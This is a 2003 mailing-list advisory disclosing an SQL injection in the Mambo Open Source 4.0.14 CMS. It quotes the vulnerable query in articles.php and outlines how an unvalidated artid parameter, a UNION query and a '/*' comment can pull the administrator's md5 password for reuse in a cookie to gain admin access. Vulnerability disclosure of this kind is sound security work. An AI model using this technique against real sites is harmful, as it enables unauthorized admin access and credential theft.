Mambo Open Source 4.0.14 SQL injection

From: Chintan Trivedi (
Date: 12/10/03

  • Next message: William Stockall: "Re: Internet Explorer URL parsing vulnerability"
    Date: 10 Dec 2003 17:56:31 -0000
    ('binary' encoding is not supported, stored as-is)

    Mambo Open Source 4.0.14


            Mambo Open Source is the open source Web Content Management System. Mambo Open Source CMS is used by many websites including the commercial ones.

    The function show() in mambo/articles.php file is like

    function show ($articles, $database, $dbprefix, $artid, $gid, $db) {
            $query = "SELECT title, content, author FROM ".$dbprefix."articles, ".$dbprefix."categories WHERE artid=$artid AND ".$dbprefix."articles.published=1 AND ".$dbprefix."categories.categoryid=".$dbprefix."articles.catid AND ".$dbprefix."categories.access <=$gid";
            $result = $database->openConnectionWithReturn($query);


    There hasn't been any input validation for the variable artid. An attacker can thus insert his own sql query and get the administrator md5 pass from mod_users table and use it in cookie to gain admin access to the Mamboo CMS system.

    How do I know whether I am vulnerable ?

    If you get an error message as

    Query failed with error: You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near 'UNION somequery AND mos_articles.published=1 AND mos_categories.

    means you are vulnerable. An attacker can use "/*" to comment rest of the querry.


    Chintan Trivedi -
    "Eye On Security Research Group India".


  • Next message: William Stockall: "Re: Internet Explorer URL parsing vulnerability"

    Relevant Pages

    • GrayCMS php code injection
      ... ('binary' encoding is not supported, ... Severity: High ... Vendor: ... ghc, 0xdeadbabe, unl0ck & others ...
    • myBloggie 2.1.1
      ... ('binary' encoding is not supported, ... # Vendor: ... [Infektion Group] ...
    • Remote IIS 5.x and IIS 6.0 Server Name Spoof
      ... ('binary' encoding is not supported, ... Vendor Status: Notified 28. ... Full Disclosure Proof of Consept at ...
    • XOOPS WebChat module - patch UPDATE
      ... ('binary' encoding is not supported, ... (you can download patched file from ... Vendor has still not answered. ... Sorry again for lost time:o| ...